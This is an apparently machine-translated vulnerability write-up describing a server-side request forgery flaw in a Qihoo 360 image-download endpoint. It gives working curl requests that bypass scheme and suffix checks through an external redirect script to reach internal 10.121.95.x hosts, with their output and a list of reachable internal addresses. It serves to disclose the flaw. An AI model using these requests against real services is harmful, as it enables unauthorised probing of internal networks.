Magic Weapon: Qihoo 360 an SSRF bypasses the restriction on proxy access to the Intranet

Magic Weapon: Qihoo 360 an SSRF bypasses the restriction on proxy access to the Intranet

In front of an artifact ..

Http://luyou.360.cn/activity/downLoadImg.php? Url = https://ss0.bdstatic.com/5aV1bjqh_Q23odCf/static/superplus/img/logo_white.png&filetype=jpg&filename=360ProductSpecificationp-p1

The logic is to obtain the content of an image and then write it to another file.

Naturally, I thought about whether I could access the Intranet. After trying, I found two restrictions:

1. the url must be http or https

2. The suffix must be an image.

Okay, so let's try this:

Http://luyou.360.cn/activity/downLoadImg.php? Url = http://navsite.adsys.qihoo.net /? Logo_white.png & filetype = jpg & filename = 360ProductSpecificationp-p1

Still not working, so these Guesses are based on the host judgment, bypassing the host is corresponding to the Intranet, no request

After thinking about it, I decided to try the jump. The result was successful.

Http://luyou.360.cn/activity/downLoadImg.php? Url = http://x1x2x3.duapp.com/l.php? Url = http: // 10.121.95.65 /? 2017210000348ee.jpg & filetype = jpg & filename = 360ProductSpecificationp-p1

➜  tmp  curl "http://luyou.360.cn/activity/downLoadImg.php?url=http://x1x2x3.duapp.com/l.php?url=http://10.121.95.65/?%2378348ee.jpg&filetype=jpg&filename=360ProductSpecificationp-p1"

 Welcome to nginx!



The following is a simple test:

We found that 80 of some ip addresses is available:

10.121.95.65

10.121.95.168

10.121.95.160

10.121.95.222


 
➜  tmp  curl "http://luyou.360.cn/activity/downLoadImg.php?url=http://x1x2x3.duapp.com/l.php?url=http://navsite.adsys.qihoo.net/?%2378348ee.jpg&filetype=jpg&filename=360ProductSpecificationp-p1"<!DOCTYPE html>
Solution:
Filter